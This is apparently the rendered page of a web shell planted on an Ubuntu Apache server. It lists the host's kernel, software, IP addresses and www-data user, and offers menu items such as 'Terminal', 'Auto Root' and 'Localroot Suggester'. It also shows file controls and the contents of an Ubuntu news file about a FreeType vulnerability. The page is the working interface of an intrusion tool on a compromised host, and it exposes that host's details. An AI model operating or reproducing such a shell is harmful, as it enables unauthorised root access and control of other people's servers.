Linux webserver 6.8.0-49-generic #49~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Nov 6 17:42:15 UTC 2 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.1.1 & Your IP : 3.16.130.38
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
run /
ubuntu-advantage /
Delete
Unzip
Name
Size
Permission
Date
Action
notices
[ DIR ]
drwxr-xr-x
2025-05-13 10:34
aptnews.json
2
KB
-rw-r--r--
2025-05-09 23:05
Save
Rename
{ "messages": [ { "begin": "2025-03-25T00:00:00Z", "selectors": { "codenames": ["xenial"], "packages": [ ["libfreetype6", "<", "2.6.1-0.1ubuntu2.5+esm2"] ] }, "lines": [ "Patch available for a potential RCE vulnerability ", "in FreeType, tracked by CVE-2025-27363.", "For more see: https://ubuntu.com/security/CVE-2025-27363" ] }, { "begin": "2025-03-25T00:00:00Z", "selectors": { "codenames": ["bionic"], "packages": [ ["libfreetype6", "<", "2.8.1-2ubuntu2.2+esm1"] ] }, "lines": [ "Patch available for a potential RCE vulnerability ", "in FreeType, tracked by CVE-2025-27363.", "For more see: https://ubuntu.com/security/CVE-2025-27363" ] }, { "begin": "2025-03-25T00:00:00Z", "selectors": { "codenames": ["focal"], "packages": [ ["libfreetype6", "<", "2.10.1-2ubuntu0.4"] ] }, "lines": [ "Patch available for a potential RCE vulnerability ", "in FreeType, tracked by CVE-2025-27363.", "For more see: https://ubuntu.com/security/CVE-2025-27363" ] }, { "begin": "2025-03-25T00:00:00Z", "selectors": { "codenames": ["jammy"], "packages": [ ["libfreetype6", "<", "2.11.1+dfsg-1ubuntu0.3"] ] }, "lines": [ "Patch available for a potential RCE vulnerability ", "in FreeType, tracked by CVE-2025-27363.", "For more see: https://ubuntu.com/security/CVE-2025-27363" ] } ] }